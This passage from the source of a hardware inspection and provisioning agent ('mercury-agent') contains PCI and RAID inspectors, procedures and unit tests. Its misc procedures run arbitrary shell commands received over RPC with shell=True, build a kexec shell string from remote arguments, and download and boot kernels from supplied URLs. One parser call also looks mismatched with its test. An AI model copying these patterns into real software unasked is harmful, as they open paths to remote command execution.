def __setattr__(self, key, value):
self[key] = value
class PCIBus(list):
def __init__(self, sudo=False):
super(PCIBus, self).__init__()
for it in parse_nnvmmk():
self.append(PCIDevice(**it))
def get_devices_by_class(self, class_id):
sub_li = list()
for device in self:
if device.get('class_id') == class_id:
sub_li.append(device)
return sub_li
def has_device_class(self, class_id):
for device in self:
if device.get('class_id') == class_id:
return True
return False
def get_devices_by_vendor(self, vendor_id):
sub_li = list()
for device in self:
if device.get('vendor_id') == vendor_id:
sub_li.append(device)
return sub_li
def get_fibre_channel_devices(self):
return self.get_devices_by_class(FIBRE_CHANNEL)
def has_fibre_channel(self):
return self.has_device_class(FIBRE_CHANNEL)
def get_ethernet_devices(self):
return self.get_devices_by_class(ETHERNET_CONTROLLER)
def has_ethernet(self):
return self.has_device_class(ETHERNET_CONTROLLER)
def get_network_devices(self):
return self.get_devices_by_class(NETWORK_CONTROLLER)
def has_network(self):
return self.has_device_class(NETWORK_CONTROLLER)
def get_raid_bus_controller_devices(self):
return self.get_devices_by_class(RAID_CONTROLLER)
def has_raid_bus_controller(self):
return self.has_device_class(RAID_CONTROLLER)
```
#### File: inspector/hwlib/mercury_id.py
```python
import hashlib
import logging
from mercury.common.exceptions import MercuryIdException
LOG = logging.getLogger(__name__)
META_TYPE_MAC = '00'
META_TYPE_PRODUCT_UUID = '01'
META_TYPE_CHASSIS_ASSET_SERIAL = '02'
META_TYPE_BOARD_ASSET_SERIAL = '03'
def _build_hash(target, meta_type):
digest = hashlib.sha1(target).hexdigest()
return meta_type + digest
def get_embedded(inspected_interfaces):
embedded_interfaces = []
for interface in inspected_interfaces:
_biosdevname = interface['predictable_names'].get('biosdevname', '')
if _biosdevname:
if 'em' in _biosdevname:
embedded_interfaces.append(interface)
return embedded_interfaces
# methods
def dmi_methods(dmi):
product_uuid = dmi.get('product_uuid')
chassis_asset_tag = dmi.get('chassis_asset_tag')
chassis_serial = dmi.get('chassis_serial')
board_asset_tag = dmi.get('board_asset_tag')
board_serial = dmi.get('board_serial')
disqualify = 'To Be Filled By O.E.M.'
if product_uuid:
LOG.debug('Generating mercury ID using product_uuid: %s' % product_uuid)
return _build_hash(product_uuid, META_TYPE_PRODUCT_UUID)
if disqualify in [chassis_asset_tag, chassis_serial, board_asset_tag, board_serial]:
LOG.debug('Junk in DMI tables: \'%s\'' % disqualify)
return
if chassis_asset_tag and chassis_serial:
LOG.debug('Generating mercury ID using chassis asset information: tag=%s, asset=%s' % (
chassis_asset_tag, chassis_serial))
return _build_hash(chassis_asset_tag + chassis_serial, META_TYPE_CHASSIS_ASSET_SERIAL)
if board_asset_tag and board_serial:
LOG.debug('Generating mercury ID using board asset information: tag=%s, asset=%s' % (
board_asset_tag, board_serial))
return _build_hash(board_asset_tag + board_serial, META_TYPE_BOARD_ASSET_SERIAL)
def generate_mercury_id(inspected_dmi, inspected_interfaces):
mercury_id = dmi_methods(inspected_dmi)
if mercury_id:
return mercury_id
else:
meta_type = META_TYPE_MAC
embedded = get_embedded(inspected_interfaces)
if embedded:
LOG.debug('Generating mercury ID using embedded interfaces ')
inspected_interfaces = embedded
else:
LOG.debug('Generating mercury ID using all interfaces')
target = ''
for interface in inspected_interfaces:
address = interface.get('address') # mac address
if address:
target += address
if not target:
raise MercuryIdException('Could not generate MercuryId')
return _build_hash(target, meta_type)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
from mercury_agent.inspector.inspectors.dmi import dmi_inspector
from mercury_agent.inspector.inspectors.interfaces import interface_inspector
_dmi = dmi_inspector()
_interfaces = interface_inspector()
print(generate_mercury_id(_dmi, _interfaces))
```
#### File: inspector/inspectors/agent_info.py
```python
import pkg_resources
from mercury_agent.inspector.inspectors import expose
@expose('agent_info')
def agent_inspector():
_info = {
'agent_version':
pkg_resources.get_distribution('mercury-agent').version,
'mercury_version':
pkg_resources.get_distribution('mercury-core').version,
}
try:
with open('/etc/hostname') as fp:
hostname = fp.read().strip()
except (IOError, OSError):
hostname = None
_info['hostname'] = hostname
return _info
if __name__ == '__main__':
from pprint import pprint
pprint(agent_inspector())
```
#### File: inspector/inspectors/inspector.py
```python
import logging
import sys
import traceback
log = logging.getLogger(__name__)
inspectors = []
late_inspectors = []
async_inspectors = []
# TODO: Consider manifest driven inspector orchestration
def run_inspector(name, f, *args, **kwargs):
# noinspection PyBroadException
try:
log.debug('Running inspector: %s' % name)
return f(*args, **kwargs)
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
path, line, scope, code = traceback.extract_tb(exc_traceback)[-1]
log.error('Inspector raised an unhandled exception (%s : %s): name=%s, scope=%s, '
'path=%s, line=%d, code=%s' % (exc_type,
exc_value,
name,
scope,
path,
line,
code))
return None
def expose(name):
def wrap(f):
def wrapped_f(*args, **kwargs):
return run_inspector(name, f, *args, **kwargs)
log.debug('Adding runtime inspector %s (%s)' % (f.__name__, name))
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
inspectors.append((name, wrapped_f))
return wrapped_f
return wrap
def expose_late(name, run_if=None):
"""Hardware dependent inspectors, such as those dependent on OEM/ODM utilities
:param run_if: callback funtion that takes device_info as an argument. This is optional,
run_if can always be added by other means
"""
def wrap(f):
def wrapped_f(early_device_info):
if hasattr(f, 'run_if') and not f.run_if(early_device_info):
log.info('Requirement not satisfied for %s (%s)' % (f.__name__, name))
return None
return run_inspector(name, f, early_device_info)
log.debug('Adding late inspector %s (%s)' % (f.__name__, name))
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
if run_if:
wrapped_f.run_if = run_if
late_inspectors.append((name, wrapped_f))
return wrapped_f
return wrap
```
#### File: inspector/inspectors/raid.py
```python
import logging
from mercury_agent.hardware.drivers import get_subsystem_drivers
from mercury_agent.inspector.inspectors import expose_late
log = logging.getLogger(__name__)
# noinspection PyUnusedLocal
@expose_late('raid')
def raid_inspector(device_info):
drivers = get_subsystem_drivers('raid')
if not drivers:
return
_inspected = list()
for driver in drivers:
log.info('Running RAID inspector %s' % driver.name)
data = driver.inspect()
if isinstance(data, list):
_inspected += data
else:
_inspected.append(data)
return _inspected
```
#### File: mercury_agent/procedures/inspector.py
```python
from mercury_agent.capabilities import capability
from mercury_agent.configuration import get_configuration
from mercury_agent.inspector import inspect
from mercury_agent.inspector.inspect import global_device_info
from mercury_agent.inspector.inspectors import health
@capability('inspector', description='Run inspector')
def inspector():
"""
Manually run inspectors
:return: results
"""
return inspect.inspect()
@capability('check_hardware', description='Check hardware for errors')
def check_hardware():
"""
Checks hardware for inconsistencies and defects. Returns a list of discovered critical errors.
:return:
"""
configuration = get_configuration().agent
errors = []
_health_data = health.system_health_inspector(global_device_info)
if _health_data['corrected_hardware_event_count'] >= configuration.hardware.mce_threshold:
errors.append(
'MCE count is {} which is above the configured threshold of {}'.format(
_health_data['corrected_hardware_event_count'],
configuration.hardware.mce_threshold))
return {
'errors': errors,
'error_count': len(errors)
}
```
#### File: mercury_agent/procedures/megaraid.py
```python
import logging
from mercury_agent.capabilities import capability
from mercury_agent.backend_client import get_backend_client
from mercury_agent.hardware.drivers.drivers import driver_class_cache
from mercury_agent.inspector.inspect import global_device_info
from mercury_agent.inspector.inspectors.raid import raid_inspector
log = logging.getLogger(__name__)
def get_megaraid_driver():
return driver_class_cache.get('megaraid_sas')
def has_megaraid_driver():
return bool(get_megaraid_driver())
def update_inventory():
backend_client = get_backend_client()
raid_info = raid_inspector(global_device_info)
mercury_id = global_device_info['mercury_id']
log.debug('RAID configuration changed, updating inventory')
backend_client.update(mercury_id, {'raid': raid_info})
def update_on_change(f):
def wrapped_f(*args, **kwargs):
result = f(*args, **kwargs)
update_inventory()
return result
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
return wrapped_f
@capability('megaraid_add',
description='Create and array on a megaraid_sas based controller',
kwarg_names=['controller', 'array_type', 'drives'],
serial=True,
dependency_callback=has_megaraid_driver,
timeout=60,
task_id_kwargs=True
)
@update_on_change
def megaraid_add(controller,
array_type,
drives,
size=None,
pdperarray=None,
pdcache=None,
dimmerswitch=None,
io_mode='direct',
write_policy='wb',
read_policy='ra',
cachevd=False,
stripe_size=None,
spares=None,
cached_bad_bbu=False,
after_vd=None):
""" Add virtual drive
:param controller: Controller ID
:param array_type: r[0|1|5|6|10|50|60]
:param drives: Drives specified with as EncID:drive,...
:param size: Size of a drive in MB or None for maximum
:param pdperarray: Specifies the number of physical drives per array. The
default value is automatically chosen.(0 to 16)
:param pdcache: Enables or disables PD cache. (on|off|default)
:param dimmerswitch: Specifies the power-saving policy. Sets to default
automatically. default: Logical device uses controller default power-saving
policy. automatic (auto): Logical device power savings managed by firmware.
none: No power-saving policy.
maximum (max): Logical device uses maximum power savings.
MaximumWithoutCaching (maxnocache): Logical device does not cache write to
maximize power savings.
:param io_mode: cached|direct
:param write_policy:wb|rt
:param read_policy:ra|rt
:param cachevd: enables or disables cachecade device support
:param stripe_size: stripe size ( the amount of data writen before moving to
the next disk )
:param spares: Numer drives allocated as hot spares
:param cached_bad_bbu: Enable write caches even when the bbu is missing or
discharged
:param after_vd: Specify an existing VD to add this new vd behind
:return: AttributeString of command output
"""
driver = get_megaraid_driver()
log.info('Adding Array: /c{} RAID{} drives: {} size: {}'.format(
controller,
array_type,
drives,
size
))
return driver.storcli.add(
controller,
array_type,
drives,
size=size,
pdperarray=pdperarray,
pdcache=pdcache,
dimmerswitch=dimmerswitch,
io_mode=io_mode,
write_policy=write_policy,
read_policy=read_policy,
cachevd=cachevd,
stripe_size=stripe_size,
spares=spares,
cached_bad_bbu=cached_bad_bbu,
after_vd=after_vd,
)
@capability('megaraid_delete',
description='Delete megaraid based virtual drive',
kwarg_names=['controller'],
serial=True,
dependency_callback=has_megaraid_driver,
timeout=60,
task_id_kwargs=True)
@update_on_change
def megaraid_delete(controller, virtual_drive='all'):
"""
:param controller: Controller id or all
:param virtual_drive: Virtual Drive id or all
:return:
"""
driver = get_megaraid_driver()
log.info('Deleting virtual drive: {} on controller: {}'.format(
controller, virtual_drive
))
return driver.storcli.delete(controller, virtual_drive)
```
#### File: mercury_agent/procedures/misc.py
```python
import logging
import subprocess
from mercury.common.helpers.cli import run
from mercury_agent.capabilities import capability
from mercury_agent.procedures.lib import download_file
log = logging.getLogger(__name__)
@capability('echo', 'Echo something to the console', num_args=1)
def echo(message):
"""
Echo the dolphin
:param message: message to Echo
:return: None
"""
log.info('Echo: %s' % message)
print(message)
return message
@capability('run', 'Run an arbitrary command', num_args=1)
def runner(command, _input=''):
"""
Run a shell command
:param command: The shell command to use
:param _input: Optional data to pass to stdin
:return:
"""
log.info('Running: %s' % command)
r = run(command, ignore_error=True, raise_exception=False, _input=_input)
return {
'stdout': r.stdout,
'stderr': r.stderr,
'returncode': r.returncode
}
@capability('run_async', 'Run a command in the background', num_args=1)
def runner_async(command, shell=True):
"""
:param command:
:param shell:
:return:
"""
subprocess.Popen('{}'.format(command), shell=shell)
@capability('kexec', 'kexec into kernel at supplied location',
kwarg_names=['kernel', 'initrd', 'options'],
no_return=True, serial=True)
def kexec(kernel='', initrd='', options=None, kernel_type='bzImage'):
"""
Kexec into a kernel
"""
options = options or []
command = 'kexec --type {kernel_type} --initrd={initrd} --append="{options}" {kernel}'.format(
kernel_type=kernel_type,
initrd=initrd,
options=' '.join(options),
kernel=kernel
)
# TODO: implement workflow that allows an agent to un-register itself
# Sleep a little bit to allow the command to return
log.info('Running Kexec: {}'.format(command))
runner_async('sleep 5;' + command)
@capability('reload', 'kexec into current preboot kernel, re-downloading the root file system',
num_args=2)
def reload(kernel_url, initrd_url):
"""
Reload the environment
"""
# This should look into the configuration to find the location
# of the kernel/initrd images and download them
kernel_file = '/tmp/vmlinuz'
initrd_file = '/tmp/initrd'
log.info('Downloading: {}'.format(kernel_url))
download_file(kernel_url, kernel_file)
log.info('Downloading: {}'.format(initrd_url))
download_file(initrd_url, initrd_file)
with open('/proc/cmdline') as fp:
options = fp.readline().split()
kexec(kernel=kernel_file, initrd=initrd_file, options=options)
```
#### File: mercury-agent/scratch/client_test.py
```python
import msgpack
import zmq
def transceiver(s, d):
packed = msgpack.packb(d)
s.send_multipart([packed])
return msgpack.unpackb(socket.recv(), encoding='utf-8')
ctx = zmq.Context()
socket = ctx.socket(zmq.REQ)
socket.connect('tcp://localhost:9003')
for i in range(100):
response = transceiver(socket, dict(category='rpc', method='echo', args=['This is the message: %s' % i]))
print(response)
response = transceiver(socket, dict(category='rpc', method='inspector'))
from pprint import pprint
pprint(response)
```
#### File: oem/hp/test_hpasm.py
```python
import unittest
import mock
from mercury.common.helpers.cli import CLIResult
from mercury_agent.hardware.oem.hp import hpasmcli
class TestHPASMCLI(unittest.TestCase):
show_server_data = '\n\nSystem : ProLiant DL380 Gen9\nSerial No. : TC51NR9952\n' \
'ROM version : v2.60 (05/21/2018) P89\nUEFI Support : Yes\niLo ' \
'present : Yes\nEmbedded NICs : 8\n\tNIC1 MAC: 38:63:bb:3f:4b:f4\n\t' \
'NIC2 MAC: 38:63:bb:3f:4b:f5\n\tNIC3 MAC: 38:63:bb:3f:4b:f6\n\tNIC4 MAC: ' \
'38:63:bb:3f:4b:f7\n\tNIC5 MAC: 8c:dc:d4:ad:d6:d0\n\tNIC6 MAC: ' \
'8c:dc:d4:ad:d6:d1\n\tNIC7 MAC: 68:05:ca:39:89:a0\n\tNIC8 MAC: 68:05:ca:39:89:a1' \
'\n\nProcessor: 0\n\tName : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz' \
'\n\tStepping : 2\n\tSpeed : 2400 MHz\n\tBus : 100 MHz\n\tCore' \
' : 8\n\tThread : 16\n\tSocket : 1\n\tLevel1 Cache : ' \
'512 KBytes\n\tLevel2 Cache : 2048 KBytes\n\tLevel3 Cache : 20480 KBytes\n\t' \
'Status : Ok\n\nProcessor: 1\n\tName : ' \
'Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz\n\tStepping : 2\n\t' \
'Speed : 2400 MHz\n\tBus : 100 MHz\n\tCore : 8\n\t' \
'Thread : 16\n\tSocket : 2\n\tLevel1 Cache : 512 KBytes\n\t' \
'Level2 Cache : 2048 KBytes\n\tLevel3 Cache : 20480 KBytes\n\tStatus : Ok' \
'\n\nProcessor total : 2\n\nMemory installed : 131072 MBytes\nECC ' \
'supported : Yes\n\n\n'
show_dimm_data = """
DIMM Configuration
------------------
Processor #: 1
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
"""
show_power_supply_data = '\nPower supply #1\n\tPresent : Yes\n\tRedundant: Yes' \
'\n\tCondition: Ok\n\tHotplug : Supported\n\tPower : 110 ' \
'Watts\nPower supply #2\n\tPresent : Yes\n\tRedundant: Yes' \
'\n\tCondition: Ok\n\tHotplug : Supported\n\tPower : 100 Watts\n\n'
def setUp(self):
self.mock_cli_patch = mock.patch('mercury_agent.hardware.oem.hp.hpasmcli.cli')
self.mock_cli = self.mock_cli_patch.start()
self.mock_cli.find_in_path = mock.Mock(return_value='/bin/bash')
def tearDown(self):
self.mock_cli_patch.stop()
def test_show_server(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_server_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
details = hpasm.show_server()
self.assertEqual(len(details['processors']), 2)
self.assertEqual(details['system'], 'ProLiant DL380 Gen9')
def test_show_dimmm(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_dimm_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
details = hpasm.show_dimm()
self.assertEqual(details[-1]['processor_#'], 2)
def test_show_power_supply(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_power_supply_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
power_supplies = hpasm.show_powersupply()
for ps in power_supplies:
self.assertEqual(ps['condition'], 'Ok')
```
#### File: unit/hwlib/test_lspci.py
```python
import mock
import pytest
import mercury_agent.inspector.hwlib.lspci as lspci
from tests.unit.base import MercuryAgentUnitTest
EXAMPLE_LSPCI_OUTPUT = """Slot: 00:00.0
Class: Host bridge [0600]
Vendor: Intel Corporation [8086]
Device: Xeon E7 v3/Xeon E5 v3/Core i7 DMI2 [2f00]
SVendor: Intel Corporation [8086]
SDevice: Device [0000]
Rev: 02
NUMANode: 0
Slot: 00:01.0
Class: PCI bridge [0604]
Vendor: Intel Corporation [8086]
Device: Xeon E7 v3/Xeon E5 v3/Core i7 PCI Express Root Port 1 [2f02]
Rev: 02
Driver: pcieport
Module: shpchp
NUMANode: 0
Slot: 00:14.0
Class: USB controller [0c03]
Vendor: Intel Corporation [8086]
Device: C610/X99 series chipset USB xHCI Host Controller [8d31]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [8600]
Rev: 05
ProgIf: 30
Driver: xhci_hcd
NUMANode: 0
Slot: 00:16.0
Class: Communication controller [0780]
Vendor: Intel Corporation [8086]
Device: C610/X99 series chipset MEI Controller #1 [8d3a]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [8600]
Rev: 05
Driver: mei_me
Module: mei_me
NUMANode: 0
Slot: 00:19.0
Class: Ethernet controller [0200]
Vendor: Intel Corporation [8086]
Device: Ethernet Connection (2) I218-V [15a1]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [85c4]
Rev: 05
Driver: e1000e
Module: e1000e
NUMANode: 0
Slot: 05:00.0
Class: Non-Volatile memory controller [0108]
Vendor: Samsung Electronics Co Ltd [144d]
Device: NVMe SSD Controller SM951/PM951 [a802]
SVendor: Samsung Electronics Co Ltd [144d]
SDevice: Device [a801]
PhySlot: 2-1
Rev: 01
ProgIf: 02
Driver: nvme
Module: nvme
NUMANode: 0
"""
EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT = [
{
'slot': u'00:00.0',
'class_name': u'Host bridge',
'class_id': u'0600',
'vendor_name': u'Intel Corporation',
'vendor_id': u'8086',
'device_name': u'Xeon E7 v3/Xeon E5 v3/Core i7 DMI2',
'device_id': u'2f00',
'svendor_name': u'Intel Corporation',
'svendor_id': u'8086',
'sdevice_name': u'Device',
'sdevice_id': u'0000',
'revision': u'02',
},
{
'slot': '00:01.0',
'class_name': 'PCI bridge',
'class_id': '0604',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'Xeon E7 v3/Xeon E5 v3/Core i7 PCI Express Root Port 1',
'device_id': '2f02',
'revision': '02',
'driver': 'pcieport',
},
{
'slot': '00:14.0',
'class_name': 'USB controller',
'class_id': '0c03',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'C610/X99 series chipset USB xHCI Host Controller',
'device_id': '8d31',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '8600',
'revision': '05',
'progif': '30',
'driver': 'xhci_hcd'
},
{
'slot': '00:16.0',
'class_name': 'Communication controller',
'class_id': '0780',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'C610/X99 series chipset MEI Controller #1',
'device_id': '8d3a',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '8600',
'revision': '05',
'driver': 'mei_me'
},
{
'slot': '00:19.0',
'class_name': 'Ethernet controller',
'class_id': '0200',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'Ethernet Connection (2) I218-V',
'device_id': '15a1',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '85c4',
'revision': '05',
'driver': 'e1000e'
},
{
'slot': '05:00.0',
'class_name': 'Non-Volatile memory controller',
'class_id': '0108',
'vendor_name': 'Samsung Electronics Co Ltd',
'vendor_id': '144d',
'device_name': 'NVMe SSD Controller SM951/PM951',
'device_id': 'a802',
'svendor_name': 'Samsung Electronics Co Ltd',
'svendor_id': '144d',
'sdevice_name': 'Device',
'sdevice_id': 'a801',
'revision': '01',
'driver': 'nvme',
'progif': '02',
},
]
FIELDS_PARSED_BY_MODULE = [
'class_id',
'class_name',
'device_id',
'device_name',
'driver',
'progif',
'revision',
'sdevice_id',
'sdevice_name',
'slot',
'svendor_id',
'svendor_name',
'vendor_id',
'vendor_name',
]
# Missing entries should be set to None to match unit behavior.
def _fixup_parsed_output():
for device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT:
for field in FIELDS_PARSED_BY_MODULE:
if field not in device.keys():
device[field] = None
_fixup_parsed_output()
def get_fake_pcidevice_required_args(slot='00:00.0', class_id='beef',
vendor_id='dead', device_id='ffff'):
"""Get a dict of args for lspci.PCIDevice"""
return {
'slot': slot,
'class_id': class_id,
'vendor_id': vendor_id,
'device_id': device_id
}
class MercuryMiscLspciUnitTests(MercuryAgentUnitTest):
"""Unit tests for mercury_agent.inspector.hwlib.lspci"""
@mock.patch('mercury_agent.inspector.hwlib.lspci.subprocess.Popen')
def setUp(self, popen_mock):
"""Setup a PCIBus object for each test."""
popen_mock.return_value.communicate.return_value = (
EXAMPLE_LSPCI_OUTPUT, '')
popen_mock.return_value.returncode = 0
self.pci_bus = lspci.PCIBus()
def test_example_output_parsing(self):
"""Test if PCIBus/parse_lspci parsed the example output correctly."""
assert len(self.pci_bus) == len(EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT)
for device in self.pci_bus:
assert device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
@mock.patch('mercury_agent.inspector.hwlib.lspci.subprocess.Popen')
def test_lscpi_run_raises(self, popen_mock):
"""Test what happens when lspci returns non-zero error."""
popen_mock.return_value.communicate.return_value = (
EXAMPLE_LSPCI_OUTPUT, '')
popen_mock.return_value.returncode = 1
with pytest.raises(lspci.LSPCIError):
lspci.lspci_run()
def test_pci_device_raises_on_missing_arg(self):
"""Test that PCIDevice raises when missing args."""
test_args = get_fake_pcidevice_required_args()
# Check that test_args works.
lspci.PCIDevice(**test_args)
# Check key absence raises.
for key in test_args:
value = test_args[key]
del test_args[key]
with pytest.raises(lspci.LSPCIError):
lspci.PCIDevice(**test_args)
test_args[key] = value
def test_pci_device__getattr__(self):
"""Test PCIDevice.__getattr__ behavior."""
pci_device = lspci.PCIDevice(**get_fake_pcidevice_required_args())
assert pci_device.slot == '00:00.0'
assert pci_device.asdfjkl is None
def test_pcibus_get_devices_by_class(self):
"""Test PCIBus.get_devices_by_class()"""
devices = self.pci_bus.get_devices_by_class('0108')
assert isinstance(devices, list)
assert len(devices) == 1
assert devices[0]['device_id'] == 'a802'
def test_pcibus_has_device_class(self):
"""Test PCIBus.has_device_class()"""
assert self.pci_bus.has_device_class('0108')
assert self.pci_bus.has_device_class('0200')
assert not self.pci_bus.has_device_class('1337')
assert not self.pci_bus.has_device_class('beef')
def test_pcibus_get_devices_by_vendor(self):
"""Test PCIBus.get_devices_by_vendor()"""
intel_devices = self.pci_bus.get_devices_by_vendor('8086')
assert isinstance(intel_devices, list)
assert len(intel_devices) == 5
for device in intel_devices:
assert device['vendor_id'] == '8086'
assert device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
samsung_devices = self.pci_bus.get_devices_by_vendor('144d')
assert isinstance(intel_devices, list)
assert len(samsung_devices) == 1
assert samsung_devices[0]['vendor_id'] == '144d'
assert samsung_devices[0] in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
no_devices = self.pci_bus.get_devices_by_vendor('1337')
assert isinstance(no_devices, list)
assert len(no_devices) == 0
def _membership_and_retrieval_test_helper(self, class_id, name):
get_function_name = 'get_' + name + '_devices'
get_func = getattr(self.pci_bus, get_function_name)
has_function_name = 'has_' + name
has_func = getattr(self.pci_bus, has_function_name)
# Remove any of the class currently in the pci_bus object.
to_delete = []
for index in range(0, len(self.pci_bus)):
if self.pci_bus[index]['class_id'] == class_id:
to_delete.append(index)
# Go backwards so indices remain valid after deletion.
for index in reversed(to_delete):
del self.pci_bus[index]
assert not has_func()
class_devices = get_func()
assert isinstance(class_devices, list)
assert len(class_devices) == 0
self.pci_bus.append(
lspci.PCIDevice(
**get_fake_pcidevice_required_args(class_id=class_id)))
assert has_func()
class_devices = get_func()
assert isinstance(class_devices, list)
assert len(class_devices) == 1
def test_pcibus_get_has_fibre_channel_devices(self):
"""Test PCIBus.get_fibre_channel_devices()"""
"""Test PCIBus.{get,has}_fibre_channel[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.FIBRE_CHANNEL,
'fibre_channel')
def test_pcibus_get_has_ethernet_devices(self):
"""Test PCIBus.{get,has}_ethernet[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.ETHERNET_CONTROLLER,
'ethernet')
def test_pcibus_get_has_network_devices(self):
"""Test PCIBus.{get,has}_network[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.NETWORK_CONTROLLER,
'network')
def test_pcibus_get_has_raid_bus_devices(self):
"""Test PCIBus.{get,has}_raid_bus[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.RAID_CONTROLLER,
'raid_bus_controller')
```
#### File: unit/raid_abstraction/test_api.py
```python
import json
import os
from mercury_agent.hardware.raid.abstraction.api import (
RAIDAbstractionException,
RAIDActions,
)
from ..base import MercuryAgentUnitTest
class DummyImplementation(RAIDActions):
def __init__(self):
super(DummyImplementation, self).__init__()
with open(os.path.join(os.path.dirname(__file__), '../resources/dummy.json')) as fp:
self.dummy_data = json.load(fp)
def transform_adapter_info(self, adapter_index):
try:
return self.dummy_data[adapter_index]
except IndexError:
raise RAIDAbstractionException('...')
def create(self, adapter, level, drives=None, size=None, array=None):
return True
def delete_logical_drive(self, adapter, array, ld):
return True
def clear_configuration(self, adapter):
return True
def add_spares(self, adapter, drives, arrays=None):
return True
@staticmethod
def sort_drives(drives):
drives.sort(key=lambda x: '{}-{:05}-{:05}'.format(
x['extra']['port'], int(x['extra']['box']), int(x['extra']['bay'])))
class MercuryRAIDAbstractionAPITest(MercuryAgentUnitTest):
def setUp(self):
super(MercuryRAIDAbstractionAPITest, self).setUp()
self.dummy = DummyImplementation()
self.abstract = RAIDActions()
def test_raid_calc(self):
_calc = self.dummy.raid_calculator
tests = [
dict(level='0', number=1, size=300, result=300),
dict(level='1', number=2, size=300, result=300),
dict(level='5', number=3, size=300, result=600),
dict(level='6', number=6, size=300, result=1200),
dict(level='10', number=4, size=300, result=600),
dict(level='1+0', number=4, size=300, result=600),
dict(level='50', number=6, size=300, result=1200),
dict(level='60', number=8, size=300, result=1200)
]
for test in tests:
assert _calc(test['level'], test['number'], test['size']) == test['result']
self.assertRaises(RAIDAbstractionException, _calc, *('20', 0, 0, 0))
def test_raid_minimums(self):
_min = self.dummy.raid_minimums
tests = [
dict(level='1', _pass=2, fail=1),
dict(level='5', _pass=3, fail=2),
dict(level='6', _pass=4, fail=3),
dict(level='10', _pass=4, fail=7),
dict(level='1+0', _pass=4, fail=3),
dict(level='50', _pass=6, fail=5),
dict(level='60', _pass=8, fail=7)
]
for test in tests:
# Will raise on failure
self.assertEqual(_min(test['level'], test['_pass']), None)
for test in tests:
self.assertRaises(RAIDAbstractionException, _min, *(test['level'], test['fail']))
self.assertRaises(RAIDAbstractionException, _min, *('60', 11))
def test_create(self):
# Create new array
assert self.dummy.create_logical_drive(adapter=0, level='0', drives='9, 10', size='10GiB')
assert self.dummy.create_logical_drive(adapter=0, level='0', drives='9-11', size='10%FREE')
assert self.dummy.create_logical_drive(adapter=0, level='0', drives=9)
assert self.dummy.create_logical_drive(adapter=0, level='0', drives=[9, 10, 11])
# Update existing array
assert self.dummy.create_logical_drive(adapter=0, level='0', array=0, size='10%FREE')
test_exception_args = [
(0, '0', '9, 10', '100TiB'), # Size is too big
(0, '0'), # Neither drives or array is specified
(0, '0', None, '10GiB', 100), # Array index is invalid
(1, '0', None, '1MiB', 0), # Not enough free space
(0, '0', None, '100TiB', 0), # Array does not have enough free space
(0, '0', None, '100%', 0), # Only %FREE is supported
(0, '0', '11-9', None, None), # range is negative
(0, '0', '9-XXX', None, None), # range is nonsense
(0, '0', '9_10', None, None), # range needs a '-'
(0, '0', '9-10-11', None, None), # too many '-'
(0, '0', 'all', None, None), # All drives are not available
(0, '0', 'unassigned', None, None), # One of the unassigned drives is marked FAILED
]
for args in test_exception_args:
